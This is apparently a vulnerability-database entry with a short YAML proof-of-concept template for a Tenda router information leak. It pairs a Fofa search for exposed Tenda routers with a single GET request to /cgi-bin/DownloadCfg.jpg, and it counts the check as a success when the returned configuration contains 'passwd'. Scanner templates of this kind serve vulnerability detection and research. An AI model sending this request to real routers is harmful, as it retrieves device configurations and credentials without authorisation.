tenda-downloadcfg-leak: Tenda 敏感信息泄露

2025-08-01 Tenda PoC Public

Description

Fofa: app="Tenda-路由器"

PoC

id: tenda-downloadcfg-leak

info:
  name: Tenda 敏感信息泄露
  author: zan8in
  severity: high
  verified: true
  description: |-
    Fofa: app="Tenda-路由器"
  tags: tenda,route,leak
  created: 2024/01/07

rules:
  r0:
    request:
      method: GET
      path: /cgi-bin/DownloadCfg.jpg
    expression: response.status == 200 && response.body.bcontains(b'passwd')
expression: r0()

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities